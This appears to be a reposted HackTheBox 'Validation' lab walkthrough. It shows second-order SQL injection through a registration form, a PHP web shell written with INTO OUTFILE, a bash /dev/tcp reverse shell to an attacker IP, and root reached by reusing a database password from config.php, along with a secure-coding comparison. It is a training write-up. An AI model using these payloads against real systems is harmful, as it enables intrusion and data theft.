HackTheBox-Validation

admin · 2023-03-06 20:25:29 · 21 views · 13,333 characters

title: HackTheBox-Validation-SQLi author: Mosaic Theory layout: true categories: Vulnerability Labs tags:

  • Box-pwning diary


Stars are bright everywhere, depending on whether you look up to see them.

HackTheBox-Validation

Recon:

Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-17 01:08:15 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 4566/tcp on 10.10.11.116                                  
Discovered open port 80/tcp on 10.10.11.116                                    
Discovered open port 22/tcp on 10.10.11.116                                    
Discovered open port 8080/tcp on 10.10.11.116 
Nmap scan report for 10.10.11.116
Host is up (0.23s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_  256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp   open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
4566/tcp open  http    nginx
|_http-title: 403 Forbidden
8080/tcp open  http    nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.32 seconds

A registration page:

After registering, the username is echoed back on the page:

Registering different usernames in the same country also echoes them back:

>> dirsearch -u http://validation.htb/ -e php

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 8940
[09:18:48] 403 -  279B  - /.htpasswds
[09:18:48] 403 -  279B  - /.httr-oauth
[09:18:49] 403 -  279B  - /.htpasswd_test
[09:19:01] 200 -   16B  - /account.php
[09:19:14] 200 -    0B  - /config.php
[09:19:17] 301 -  314B  - /css  ->  http://validation.htb/css/
[09:19:25] 200 -   16KB - /index.php
[09:19:25] 200 -   16KB - /index.php/login/
[09:19:26] 403 -  279B  - /js/
[09:19:26] 301 -  313B  - /js  ->  http://validation.htb/js/

config.php returns nothing readable; /login is the same as index, just without the rendering.

POST / HTTP/1.1
Host: validation.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://validation.htb
DNT: 1
Connection: close
Referer: http://validation.htb/
Cookie: user=ca28b722bc10aa4b3beb941d5ca220ca
Upgrade-Insecure-Requests: 1

username=admin&country=Brazil

SQLi:

No matter how the parameters are changed, the server always responds with a Set-Cookie. If a single quote is appended to country, the server still returns a cookie, but when that returned cookie is then used as the user to load account.php, the server returns error messages:

    </div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome 21232f297a57a5a743894a0e4a801fc3'</h1><h3 class="text-white">Other Players In Brazil'</h3><br />
<b>Fatal error</b>:  Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
  thrown in <b>/var/www/html/account.php</b> on line <b>33

To verify this guess, I added a comment sequence after the single quote:

>> curl -v -d "username=hack&country=Brazil'-- -" http://validation.htb            
*   Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> POST / HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded

* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Tue, 17 May 2022 01:49:16 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Set-Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
< Location: /account.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8

* Connection #0 to host validation.htb left intact
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
*   Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> GET /account.php HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34

* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Tue, 17 May 2022 01:50:54 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Vary: Accept-Encoding
< Content-Length: 762
< Content-Type: text/html; charset=UTF-8

<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->

<div class="container">
        <h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
        
    </div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'-- </h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>admin</li>  </div>
    </section>
</div>
* Connection #0 to host validation.htb left intact

This time there was no error, so this appears to be a second-order injection:

>> curl -v -d "username=hack&country=Brazil'union select 1--+" http://validation.htb
*   Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> POST / HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Content-Length: 46
> Content-Type: application/x-www-form-urlencoded

* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Tue, 17 May 2022 01:55:16 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Set-Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
< Location: /account.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8

* Connection #0 to host validation.htb left intact
>> curl -v --cookie "user=21232f297a57a5a743894a0e4a801fc3" http://validation.htb/account.php
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->

<div class="container">
        <h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
        
    </div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome admin</h1><h3 class="text-white">Other Players In Belgium' union select 1-- -</h3><li class='text-white'>1</li></div>
    </section>
</div>
* Connection #0 to host validation.htb left intact

It looks like the injected row is echoed back in the player list.

>> curl -v -d "username=hack&country=Brazil'union select user()--+" http://validation.htb
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
<div class="container">
        <h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
        
    </div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'union select user()-- </h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>uhc@localhost</li>  </div>
    </section>
</div>

This retrieves the current database user: uhc@localhost.
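The "fetch_assoc() on bool" error at account.php:33 is what a failed $conn->query() looks like when the stored country value is spliced into the second query. As an added illustration (not the box's real account.php, whose source is never shown), here is the pattern that behaviour implies, reconstructed beside a hardened version using prepared statements; the table and column names (registration, username, country, userhash) are assumptions.

```php
<?php
// Added example, not the box's actual code. Table/column names are assumptions.
require 'config.php'; // provides $conn (mysqli), as in the config.php shown later

// --- Vulnerable: second-order injection ---------------------------------
// Registration stores whatever the client sent as "country". This page then
// trusts that stored value and concatenates it into a new query, so the
// payload fires here, one request later, not where it was submitted.
function otherPlayersVulnerable(mysqli $conn, string $userhash): array {
    $row = $conn->query("SELECT username, country FROM registration WHERE userhash = '$userhash'")->fetch_assoc();
    // A country of  Brazil' union select user()-- -  turns this into a UNION query.
    $res = $conn->query("SELECT username FROM registration WHERE country = '{$row['country']}'");
    // Malformed injected SQL makes query() return false, and fetch_assoc() then
    // throws "Call to a member function fetch_assoc() on bool".
    $names = [];
    while ($r = $res->fetch_assoc()) { $names[] = $r['username']; }
    return $names;
}

// --- Hardened: bind every value, including ones read back from the DB -----
// Data that came from the database is still attacker-controlled input.
function otherPlayersSafe(mysqli $conn, string $userhash): array {
    $stmt = $conn->prepare("SELECT country FROM registration WHERE userhash = ?");
    $stmt->bind_param('s', $userhash);
    $stmt->execute();
    $country = $stmt->get_result()->fetch_assoc()['country'] ?? '';

    $stmt = $conn->prepare("SELECT username FROM registration WHERE country = ?");
    $stmt->bind_param('s', $country);
    $stmt->execute();
    $names = [];
    foreach ($stmt->get_result() as $r) { $names[] = $r['username']; }
    // The page also echoes these values into HTML, so escape on output as well.
    return array_map(fn($n) => htmlspecialchars($n, ENT_QUOTES, 'UTF-8'), $names);
}
```

Because the registration form offers a fixed country drop-down, the country value can additionally be checked against that allow-list at registration time, which stops the payload from ever being stored.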

>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
<!------ Include the above in your HEAD tag ---------->

<div class="container">
        <h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
        
    </div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'union select database()-- </h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>registration</li>  </div>
    </section>
</div>
* Connection #0 to host validation.htb left intact

The current database is registration:

>> curl -v -d "username=hack&country=Brazil'union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'"-- -" http://validation.htb
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
<section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'"-- -</h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>SELECT</li><li class='text-white'>INSERT</li><li class='text-white'>UPDATE</li><li class='text-white'>DELETE</li><li class='text-white'>CREATE</li><li class='text-white'>DROP</li><li class='text-white'>RELOAD</li><li class='text-white'>SHUTDOWN</li><li class='text-white'>PROCESS</li><li class='text-white'>FILE</li><li class='text-white'>REFERENCES</li><li class='text-white'>INDEX</li><li class='text-white'>ALTER</li><li class='text-white'>SHOW DATABASES</li><li class='text-white'>SUPER</li><li class='text-white'>CREATE TEMPORARY TABLES</li><li class='text-white'>LOCK TABLES</li><li class='text-white'>EXECUTE</li><li class='text-white'>REPLICATION SLAVE</li><li class='text-white'>BINLOG MONITOR</li><li class='text-white'>CREATE VIEW</li><li class='text-white'>SHOW VIEW</li><li class='text-white'>CREATE ROUTINE</li><li class='text-white'>ALTER ROUTINE</li><li class='text-white'>CREATE USER</li><li class='text-white'>EVENT</li><li class='text-white'>TRIGGER</li><li class='text-white'>CREATE TABLESPACE</li><li class='text-white'>DELETE HISTORY</li><li class='text-white'>SET USER</li><li class='text-white'>FEDERATED ADMIN</li><li class='text-white'>CONNECTION ADMIN</li><li class='text-white'>READ_ONLY ADMIN</li><li class='text-white'>REPLICATION SLAVE ADMIN</li><li class='text-white'>REPLICATION MASTER ADMIN</li><li class='text-white'>BINLOG ADMIN</li><li class='text-white'>BINLOG REPLAY</li><li class='text-white'>SLAVE MONITOR</li>  </div>
    </section>
</div>
* Connection #0 to host validation.htb left intact

My current database user has a lot of privileges, including FILE:

>> curl -v -d "username=hack&country=Belgium' union select ' can you see me ?' into outfile '/var/www/html/test.txt'-- - " http://validation.htb/
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
<div class="container">
        <h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
        
    </div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Belgium' union select ' can you see me ?' into outfile '/var/www/html/test.txt'-- - </h3><br />
<b>Fatal error</b>:  Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
  thrown in <b>/var/www/html/account.php</b> on line <b>33</b><br />
* Connection #0 to host validation.htb left intact
>> curl http://validation.htb/test.txt                                                       
 can you see me ?
                  

I can write a web shell. Too many special characters cause errors, so the payload is URL-encoded:

>> curl -v -d "username=hack&country=Belgium' union select %22%3C%3Fphp%20SYSTEM(%24_REQUEST%5B%27cmd%27%5D)%3B%20%3F%3E%22%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fhtml%2Fshell.php%27%3B--%20-" http://validation.htb
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
>> curl http://validation.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shell:

>> curl http://validation.htb/shell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.16.7/9001 0>&1"'
>> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.116] 40708
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@validation:/var/www/html$
script /dev/null -c bash
^Z
stty raw -echo; fg
reset
screen

www-data has read access to the user's home directory:

www-data@validation:/var/www/html$ ls
account.php  config.php  css  index.php  js  shell.php
www-data@validation:/var/www/html$ cd ~
www-data@validation:/var/www$ ls
html
www-data@validation:/var/www$ cd /
www-data@validation:/$ cd home/
www-data@validation:/home$ ls
htb
www-data@validation:/home$ cd htb/
www-data@validation:/home/htb$ ls
user.txt
www-data@validation:/home/htb$ cat user.txt 
07..................................

The configuration file contains a password. The system reports that user uhc does not exist, but reusing the password for root succeeds:

www-data@validation:/var/www/html$ ls
account.php  config.php  css  index.php  js
www-data@validation:/var/www/html$ cat config.php 
<?php
  $servername = "127.0.0.1";
  $username = "uhc";
  $password = "uhc-9qual-global-pw";
  $dbname = "registration";

  $conn = new mysqli($servername, $username, $password, $dbname);
?>
www-data@validation:/var/www/html$ su uhc
su: user uhc does not exist or the user entry does not contain all the required fields
www-data@validation:/var/www/html$ su -
Password: 
root@validation:~# cat /root/root.txt 
7a..................................


Originally published on the WeChat public account 老鑫安全: HackTheBox-Validation

When reposting, please keep the link to this article (CN-SEC: thanks to the original author): https://cn-sec.com/archives/1252822.html